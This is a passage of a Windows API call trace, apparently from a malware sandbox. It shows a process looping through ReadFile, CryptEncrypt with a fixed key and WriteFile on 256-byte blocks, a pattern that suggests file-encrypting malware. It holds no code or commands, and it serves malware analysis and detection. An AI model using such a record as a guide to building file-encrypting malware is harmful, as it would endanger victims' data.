hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.928] GetLastError () returned 0x0 [0164.928] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.928] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.928] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.928] GetLastError () returned 0x0 [0164.928] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.928] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.928] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.928] GetLastError () returned 0x0 [0164.928] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.928] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.928] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.928] GetLastError () returned 0x0 [0164.928] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.928] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.928] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.928] GetLastError () returned 0x0 [0164.928] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.928] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.928] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.949] GetLastError () returned 0x0 [0164.949] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.949] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.949] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.949] GetLastError () returned 0x0 [0164.949] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.949] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.949] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.949] GetLastError () returned 0x0 [0164.949] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.949] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.949] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.949] GetLastError () returned 0x0 [0164.949] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.949] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.949] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.950] GetLastError () returned 0x0 [0164.950] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.950] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.950] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.950] GetLastError () returned 0x0 [0164.950] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.950] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.950] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.950] GetLastError () returned 0x0 [0164.950] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.950] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.950] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.950] GetLastError () returned 0x0 [0164.950] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.950] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.950] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.950] GetLastError () returned 0x0 [0164.950] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.950] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.950] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.950] GetLastError () returned 0x0 [0164.950] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.950] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.951] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.951] GetLastError () returned 0x0 [0164.951] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.951] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.951] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.951] GetLastError () returned 0x0 [0164.951] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.951] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.951] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.951] GetLastError () returned 0x0 [0164.951] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.951] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.951] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.951] GetLastError () returned 0x0 [0164.951] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.951] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.951] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.951] GetLastError () returned 0x0 [0164.951] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.951] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.951] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.951] GetLastError () returned 0x0 [0164.951] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.951] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.952] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.952] GetLastError () returned 0x0 [0164.952] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.952] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.952] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.952] GetLastError () returned 0x0 [0164.952] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.952] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.952] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.952] GetLastError () returned 0x0 [0164.952] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.952] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.952] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.952] GetLastError () returned 0x0 [0164.952] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.952] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.952] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.952] GetLastError () returned 0x0 [0164.952] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.952] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.952] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.952] GetLastError () returned 0x0 [0164.952] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.952] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.952] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.952] GetLastError () returned 0x0 [0164.952] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.953] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.953] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.953] GetLastError () returned 0x0 [0164.953] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.953] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.953] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.953] GetLastError () returned 0x0 [0164.953] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.953] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.953] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.953] GetLastError () returned 0x0 [0164.953] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.953] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.953] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.953] GetLastError () returned 0x0 [0164.953] WriteFile (in: hFile=0x6a4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.953] ReadFile (in: hFile=0x690, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.953] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, 